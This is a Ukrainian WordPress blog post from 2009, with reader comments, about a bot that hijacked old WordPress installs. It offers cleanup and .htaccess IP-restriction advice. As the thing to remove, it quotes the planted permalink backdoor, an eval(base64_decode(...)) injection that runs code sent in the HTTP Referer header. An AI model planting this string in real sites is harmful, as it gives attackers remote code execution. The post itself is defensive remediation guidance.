• Skip to main content

Lilumi - Wordpress PHP Full Stack Developer

Hide Search
You are here: Home / wordpress фішки / Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

lilumi · 6 Вересня 2009 · 12 коментарів

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв’яка, бота (називайте як хочете) потрібно зробити:

  • В налаштуваннях ЧПУ, поміняти з
    /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
  • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

  • зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
  • створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.98.173
    

    а якщо у вас динамічна айпішка, то краще напишіть так:

    
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.0.0/255.255.0.0
    

    Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

  • Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп’ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам’ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

wordpress фішки

Reader Interactions

Comments

  1. ELECTRIC says

    7 Вересня 2009 at 09:10

    Але якщо на сайті немає реєстрації користувачів і є лише один користувач , то ця проблема не є актуальна.

    Відповіcти
    • lilumi says

      7 Вересня 2009 at 10:22

      ти знаєш, на рахунок цього, я не впевнений :) Можливо той бот реєструється в обхід звичайної системи реєстрації, користуючись якимось багом вордпресу.

      Відповіcти
  2. ELECTRIC says

    7 Вересня 2009 at 22:54

    щось дуже сумніавюся. перевірив на двох блогах. там по одному зареєстрованому адміну і все.

    Відповіcти
  3. virua says

    8 Вересня 2009 at 09:48

    Можу погодитися з думкою ELECTRIC’а, що в даному випадку ламають сайти, де є дозволена реєстрація користувачів. З власного досвіду: з 4-х моїх блогів на ВП інфіковано лише той, де є дозволена реєстрація.

    Відповіcти
    • lilumi says

      10 Вересня 2009 at 10:59

      судячи з коментарів у Лекактуса: http://lecactus.ru/2009/09/06/4712/#comment-33308 — навіть при закритій реєстрації бот умудряється реєструватись

      Відповіcти
  4. Юрко Червоний™ says

    16 Вересня 2009 at 19:33

    Я обмежив доступ по ір, у мене постійна адреса.

    Відповіcти
  5. Юрко Червоний™ says

    16 Вересня 2009 at 19:38

    До речі, у мене всюди заборонене реєстрація. а також немає показу номеру версії. І всі сайто-блоґи цілі.

    Відповіcти
    • lilumi says

      16 Вересня 2009 at 19:40

      правильно робиш

      Відповіcти
  6. Homelab says

    20 Вересня 2009 at 20:53

    Практика показує, що взламати можна все. рекомендую частіше робити бекапи, бо якщо блог стане популярним, то ламатимуть його однозначно… таке життя

    Відповіcти
  7. Макс says

    2 Грудня 2010 at 09:29

    Давно використовую .htaccess для обмеження доступу в адмін частину у сайтах які будую на вордпресі, і виявляється не дарма.

    Відповіcти
  8. Тетяна says

    13 Грудня 2010 at 10:16

    А якщо вже взломали,що тодi робити???

    Відповіcти
    • lilumi says

      13 Грудня 2010 at 12:46

      ну якщо сайт не робочий, то відновити з бекапу, поміняти паролі і обновити вордпресс та плагіни

      Відповіcти

Залишити відповідь до ELECTRIC Скасувати відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Lilumi - Wordpress PHP Full Stack Developer